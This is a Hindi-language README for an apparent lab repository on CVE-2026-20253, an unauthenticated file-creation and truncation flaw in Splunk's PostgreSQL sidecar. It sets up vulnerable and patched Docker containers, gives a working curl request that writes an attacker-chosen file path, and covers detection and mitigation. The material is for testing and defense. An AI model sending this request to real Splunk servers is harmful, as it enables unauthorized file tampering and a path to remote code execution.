
CVE-2026-20253 के लिए POC
अप्रमाणित मनमाना फ़ाइल निर्माण और कटाव PostgreSQL साइडकार के माध्यम से
CVSS 9.8 · क्रिटिकल · CWE-306 · सक्रिय रूप से शोषित (CISA KEV)
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है।
सभी परीक्षण आपके स्वामित्व वाले बुनियादी ढांचे पर या जिसके लिए आपके पास स्पष्ट लिखित अनुमति है, के विरुद्ध किया जाना चाहिए।
लेखक यहाँ प्रदर्शित तकनीकों या उपकरणों के दुरुपयोग के लिए कोई दायित्व स्वीकार नहीं करते हैं।
इसे कभी भी उत्पादन प्रणालियों या ऐसे वातावरणों पर न चलाएँ जिनके आप स्वामी नहीं हैं।
CVE-2026-20253 Splunk Enterprise के 10.2.4 और 10.0.7 से नीचे के संस्करणों को प्रभावित करता है।
Splunk के साथ बंडल की गई PostgreSQL साइडकार सेवा दो आंतरिक HTTP एंडपॉइंट उजागर करती है:
/v1/postgres/recovery/backup
/v1/postgres/recovery/restore
दोनों एंडपॉइंट में कोई प्रमाणीकरण जाँच (CWE-306) नहीं है, जिसका अर्थ है कि कोई भी नेटवर्क-पहुंच योग्य हमलावर बिना क्रेडेंशियल के उन्हें लागू कर सकता है। हमलावर-नियंत्रित backupFile पैरामीटर प्रदान करके, एक अप्रमाणित उपयोगकर्ता Splunk होस्ट फाइलसिस्टम पर मनमानी फ़ाइलें बना या काट सकता है — एक प्रिमिटिव जिसे शोधकर्ताओं ने पूर्ण पूर्व-प्रमाणीकरण रिमोट कोड निष्पादन में जोड़ा है।
| गुण | विवरण |
|---|---|
| CVE | CVE-2026-20253 |
| CVSS स्कोर | 9.8 (क्रिटिकल) |
| CWE | CWE-306 — क्रिटिकल फ़ंक्शन के लिए प्रमाणीकरण गायब |
| प्रभावित | Splunk Enterprise 10.0.x < 10.0.7, 10.2.x < 10.2.4 |
| पैच किया गया | 10.0.7, 10.2.4 |
| CISA KEV | 18 जून 2026 को जोड़ा गया |
.
├── Dockerfile # Vulnerable image (splunk 10.2.3)
├── docker-compose.yml # Vulnerable container on port 8000
├── patched.Dockerfile # Patched image (splunk 10.2.4)
├── patched-docker-compose.yml # Patched container on port 8001
└── instructions # Quick command reference
curl उपलब्ध होdocker compose -f docker-compose.yml up -d --build
Splunk के पूरी तरह से आरंभ होने तक लगभग 90 सेकंड प्रतीक्षा करें। प्रगति का अनुसरण करें:
docker compose -f docker-compose.yml logs -f
# Ready when you see: "Ansible playbook complete"
Splunk वेब UI → http://localhost:8000
क्रेडेंशियल: admin / changeme
docker compose -f patched-docker-compose.yml up -d --build
Splunk वेब UI → http://localhost:8001
क्रेडेंशियल: admin / changeme
दोनों कंटेनर एक साथ चल सकते हैं — पोर्ट्स को टकराव से बचाने के लिए ऑफसेट किया गया है।
curl -sk -X POST "http://localhost:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup" -H "Authorization: Basic cHNzZWM6Cg==" -d '{"database":"postgres","backupFile":"/tmp/poc"}' -o /dev/null -w "HTTP Status: %{http_code}\n"
अपेक्षित: 400 — एंडपॉइंट मौजूद है, कोई प्रमाणीकरण लागू नहीं किया गया, अनुरोध संसाधित किया गया।
कंटेनर के अंदर फ़ाइल बनाई गई है, इसे सत्यापित करें:
docker exec splunk-cve-2026-20253 ls -la /tmp/poc
curl -sk -X POST "http://localhost:8001/en-US/splunkd/__raw/v1/postgres/recovery/backup" -H "Authorization: Basic cHNzZWM6Cg==" -d '{"database":"postgres","backupFile":"/tmp/poc"}' -o /dev/null -w "HTTP Status: %{http_code}\n"
अपेक्षित: 401 — अब प्रमाणीकरण लागू है, अनुरोध अस्वीकार कर दिया गया।
| HTTP स्थिति | अर्थ |
|---|---|
400 | असुरक्षित — एंडपॉइंट हिट, कोई प्रमाणीकरण जाँच नहीं |
401 | पैच किया गया — प्रमाणीकरण लागू |
404 | साइडकार मौजूद नहीं / गलत पथ |
000 | कंटेनर अभी तैयार नहीं है |
watchTowr Labs टीम ने एक डिटेक्शन स्क्रिप्ट प्रकाशित की है जो उपरोक्त जाँच को स्वचालित करती है:
git clone https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
cd watchTowr-vs-Splunk-CVE-2026-20253
pip3 install requests
python3 watchTowr-vs-Splunk-CVE-2026-20253.py --host 127.0.0.1 --port 8000
# असुरक्षित को रोकें
docker compose -f docker-compose.yml down
# पैच किए गए को रोकें
docker compose -f patched-docker-compose.yml down
तुरंत एक स्थिर संस्करण में अपडेट करें:
| शाखा | स्थिर संस्करण |
|---|---|
| 10.2.x | 10.2.4 |
| 10.0.x | 10.0.7 |
यदि आप तुरंत पैच नहीं लगा सकते, तो PostgreSQL साइडकार को अक्षम करने के लिए server.conf में निम्नलिखित जोड़ें और Splunk को पुनरारंभ करें:
[postgres]
disabled = true
⚠️ यदि आप Edge Processor या SPL2 डेटा पाइपलाइन चला रहे हैं तो साइडकार को अक्षम न करें — यह उन सुविधाओं के लिए आवश्यक है।
यह लैब वातावरण केवल रक्षात्मक सुरक्षा अनुसंधान और शिक्षा के लिए प्रदान किया गया है।
कंप्यूटर सिस्टम तक अनधिकृत पहुंच कंप्यूटर फ्रॉड एंड अब्यूज़ एक्ट (CFAA), यूके कंप्यूटर मिसयूज़ एक्ट और दुनिया भर में समकक्ष कानूनों के तहत अवैध है।
जिम्मेदारी से उपयोग करें।